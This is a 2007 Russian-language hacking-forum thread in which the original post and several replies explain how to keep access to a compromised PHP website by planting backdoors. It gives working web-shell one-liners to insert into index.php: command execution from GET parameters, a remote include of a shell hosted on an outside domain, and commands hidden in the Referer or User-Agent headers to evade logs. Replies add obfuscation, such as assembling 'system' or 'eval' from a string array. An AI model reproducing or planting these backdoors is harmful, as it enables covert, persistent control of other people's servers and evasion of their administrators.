Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.01.2007, 18:29
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Троянизация скриптов
Троянизация скриптов
В этой статье будут описаны методы троянизациии серверных скриптов, написанных на PHP.
=========
Вариант 1
=========
Началось всё с того что получив шелл на сайте, я захотел как-то закрепиться и добавил в
index.php код такого содержания
PHP код:
<?php system($_GET["cmd"]) ?>
Вскоре полноценный шелл был удалён, остался только указанный выше.
Я попробовал залить полноценный, но оказалось что на серваке нет ни wget, curl, etc....
=========
Вариант 2
=========
Тогда почему же не индклудить шелл каждый раз при загрузке страници
PHP код:
<?php include("http://gaga.phpnet.us/shell.txt"); ?>
Лучше инклудить шелл, только при определенный параметрах. Сделаем более интерактивнее :
PHP код:
<?php if(@$_GET["hack"] == "yes") include($_GET['file']); ?>
При переходе по адресу, указанному ниже мы получим удаллённый шелл
Код:
http://[сайт]/index.php?hack=yes&file=[шелл]
=========
Вариант 3
=========
А что если мы протроянили скрипты таким способом, а на сервере allow_url_fopen = Off;
Тогда используем такую конструкцию :
PHP код:
<?php if(ini_get('allow_url_fopen')) include ($_GET["file"]); else system($_GET["cmd"]); ?>
У нас есть и удаленный шелл, и командная строка. Можно ещё проверить разрешены ли функции
exec(), system(), passthru(), но это увеличит размер.
Добавим авторизацию:
PHP код:
<?php if(@$_GET["hack"] == "yes") if(ini_get('allow_url_fopen')) include ($_GET["file"]); else system($_GET["cmd"]); ?>
=========
Вариант 4
=========
В приведенных выше примерах данные передаються через адресную строку браузера.
Чтобы в логах не было видно всех параметров, изменим немного исходники
PHP код:
<?php if(ini_get('allow_url_fopen')) include ($_SERVER["HTTP_REFERER"]); else system($_SERVER["HTTP_REFERER"]); ?>
В реферере, в зависимости от настроек php.ini, будет адрес шелла, или системная команда.
=========
Заключение
=========
Для изменения заголовков на лету можно использовать програму HTTPSubstitute от Zadoxlik'a
http://forum.antichat.ru/thread23569.html
Примеры скрытия Php кода опсаны в статье Great'a
http://forum.antichat.ru/thread28246.html
Последний раз редактировалось Goudini; 14.01.2007 в 20:37..
Причина: гггг
|
|
|
09.01.2007, 18:33
|
|
Участник форума
Регистрация: 23.11.2006
Сообщений: 226
Провел на форуме:
1045663
Репутация:
864
|
|
> но оказалось что на серваке нет ни wget, curl, etc....
Если у тебя есть право на сокеты, считай, шелл скачал)
Частичный бойан, но оформление красивое)
[ADDED]
Вы добавили слишком много репутации в последние 24 часа. Попробуйте попозже.
ггг
|
|
|
|
09.01.2007, 19:20
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217
Репутация:
685
|
|
Эх ... почти =)) хотел про другое написать ... лана на вечер оставлю (:
|
|
|
|
09.01.2007, 21:11
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Чтобы не удаляли <?php system($_GET["cmd"]) ?> юзай пост.. чтобы не палиться особо в логах
дальше.. можно незаметно включить в серию иф-елсов конструкцию (которая уже присутствует в файлах)...
Либо например добавляем свое.. т.е. у нас при условии поста align=1 Или align=0 в юзер агенте появляется шелл
PHP код:
if ($_POST ['align'] == "1" || $_GET ['align'] == "0") {
$server_get=$_SERVER['HTTP_USER_AGENT'];
@include($server_get);
else
{
die;
}
или опять же сделать чтониб сложное для понимания... накрутить много условий
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
21.05.2007, 03:31
|
|
Banned
Регистрация: 02.03.2007
Сообщений: 38
Провел на форуме:
38949
Репутация:
-12
|
|
угу можно и так но @ ставить для заглушки точно нужно потому как иногда ерроры выскакивают
|
|
|
|
03.06.2007, 15:20
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Блин а где еще была тема про троянизацию скритов я помню кто то отписывал как лицинзеонное соглащение в массив загнать потом выдрать нужные символы и исполнить, вообще зря замяли тему.
|
|
|
|
03.06.2007, 15:38
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217
Репутация:
685
|
|
2cash моно сделать примерно так:
Код:
<?
$lic = "abcdefghijklmnopqrstuvwxyz итд.";
$с = (собираешь слово system или eval);
$c ($_POST['cmd']);
?>
и никто не доепется =) |
|
|
|
03.06.2007, 15:51
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
мда токо название входящей переменной надо поменять га др. cmd не катит.
|
|
|
|
03.06.2007, 16:01
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217
Репутация:
685
|
|
Для примера написал
|
|
|
|
03.06.2007, 20:03
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
Блин а где еще была тема про троянизацию скритов я помню кто то отписывал как лицинзеонное соглащение в массив загнать потом выдрать нужные символы и исполнить, вообще зря замяли тему.
http://forum.antichat.ru/thread28246-gnu+gpl.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для NaX[no]rT](/avatars/avatar18908.gif){kind=avatar}
Похожие темы
Линейный вид
